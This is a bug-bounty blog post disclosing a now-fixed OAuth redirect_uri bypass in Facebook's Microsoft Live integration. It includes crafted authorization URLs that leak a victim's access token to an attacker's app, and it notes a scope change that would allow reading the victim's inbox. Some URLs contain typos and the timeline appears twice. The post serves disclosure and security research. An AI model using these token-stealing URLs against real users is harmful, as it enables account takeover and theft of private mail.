Facebook Live Application Authentication bypass
Facebook Live Application Authentication bypass – Bug Bounty POC
Hello Bug Bounty POC viewers.Today we are going to share Facebook Live Application Authentication bypass with you guys .This bug was found by Abdellah Yaala a Security Researcher from Morocco. We’ve taken permission from him to publish this poc on Bug Bounty POC.The finder of this bug reserve the full authority of publish/Unpublished this.So Let’s Start it 
There is a Live app on facebook from which user can connect there live account with Facebook when a user wants to import his contacts or reset his fb password using hotmail / outlook he visits the following url to authorize the request
https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=code&redirect_url=https://wwww.facebook.com/accept_token.php%3Fapi_ver%3Dwave5%26csrf%3DAY4SvijoflL0B8zdxFgngr88d1tg-qTPSqgb-3aYo-ER5rDcFXSfuBDr4Q4ebXs%26appdata%3D%257B%2522use_case%2522%253A1%252c%2522flow%2522%253A22%%252c%2522
As u can see the redirect_uri parameter of the url points to
https://facebook.com/accept_token.php?api_ver%3Dwave5%26csrf%3Day4Svijofll0b8ezdxf9gngr88ditg-qtpsqgb-3ayqo-er5rdcfxsfubdr4q41xbxs%26appdata%3d%257b%2522domain_id%2522%253a4%252c%2522tracked_params%2522%255b%255d%2522%257d
Now here’s the bug .. i can change that redirect_uri parameter and get the token of victim
the bypass uri is
https://www.facebook.com/ACCEPT_TOKEN.PHP?/!#/n/?https://apps.facebook.com/app_id?
Example – which link i send to user :
https://login.live.com/oauth_author.srf?client_id=0000000044002503&response_type=code&redirect_url=facebook.com/accept_token.php%3f%2f%21%23%2fn%3fapps.facebook.com%2f935728666477748%2f&locale=en-us&scope=wli.contacts_email&display=popup&swu=1&username=ocpdomaine%40hotmail.com
so when this malicious crafted url is sent to the victim i can obtain the victims access token using which i can read the victims inbox by changing the scope parameter to
scope=https://outlookoffice.ocm/Mail.Read
Facebook Live Application Authentication bypass
Facebook Live Application Authentication bypass – Video POC :
Timeline
———-
Oct 25, 2015 – Report Sent
Oct 29, 2015 – facebook need proof of concept
Oct 30, 2015 – prof concept sent
Nov 4, 2015 at 00h15 GMT – Escalation by Facebook
Nov 4, 2015 at 2h25 GMT –Confirmed fix by Facebook
Nov 6, 2015 – Bounty Awarded of $7500 by Facebook
———-
Oct 25, 2015 – Report Sent
Oct 29, 2015 – facebook need proof of concept
Oct 30, 2015 – prof concept sent
Nov 4, 2015 at 00h15 GMT – Escalation by Facebook
Nov 4, 2015 at 2h25 GMT –Confirmed fix by Facebook
Nov 6, 2015 – Bounty Awarded of $7500 by Facebook
No comments:
Post a Comment